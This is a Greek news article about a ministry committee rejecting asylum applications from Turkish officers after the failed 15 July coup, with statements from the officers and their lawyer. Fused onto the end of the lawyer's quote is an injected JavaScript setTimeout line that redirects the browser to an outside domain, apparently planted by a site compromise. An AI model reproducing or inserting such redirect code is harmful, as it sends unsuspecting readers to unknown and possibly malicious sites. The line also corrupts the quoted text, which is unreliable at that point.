Απορρίφθηκαν οι αιτήσεις ασύλου των Τούρκων αξιωματικών

0
4

 

Απορρίφθηκαν από την αρμόδια επιτροπή του υπουργείου Εσωτερικών άλλες 6 αιτήσεις άσυλου των Τούρκων στρατιωτικών που ήρθαν στην Ελλάδα μετά το αποτυχημένο πραξικοπήματα της 15ης Ιουλίου.

Συνολικά ως τώρα έχουν απορριφθεί οι αιτήσεις 7 εκ των 8 αξιωματικών με το αιτιολογικό ότι συμμετείχαν στο πραξικόπημα που αποτελεί «τρομοκρατική πράξη».

Οι 8 αξιωματικοί δήλωσαν μέσω της δικηγόρου τους Σταυρούλας Τομαρά:

«Είμαστε έκπληκτοι με τις αποφάσεις της υπηρεσίας άσυλου που εκτός του ότι απορρίπτουν το δίκαιο αίτημα άσυλου μας, μας αποδίδουν τον βαρύτατο χαρακτηρισμό του τρομοκράτη ο όποιος όχι μόνο δεν τεκμαίρεται από κανένα γεγονός αλλά δεν μας έχουν κατηγορήσει ως τρομοκράτες ούτε μέσα στη χωρά μας. Ελπίζουμε η ελληνική κυβέρνηση να λάβει σοβαρά ειπούν της τη στάση των άλλων 5 κρατών μελών της ΕΕ που έθεσαν σε καθεστώς διεθνούς προστασίας τους Τούρκους αξιωματικούς που ζήτησαν άσυλο στις επικράτειές τους μετά το πραξικόπημα».

Από την πλευρά της η δικηγόρος τους, κα Τομαρα δήλωσε:
«Φοβάμαι πολύ ότι αυτά δε συμβαίνουν τυχαία αν και ήμασταν προετοιμασμένοι εδώ και δυο μήνες και είχαμε λάβει τα μετρά μας ενεργώντας. Θα εξακολουθήσουμε ο,τι προβλέπεται από τη διαδικασία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here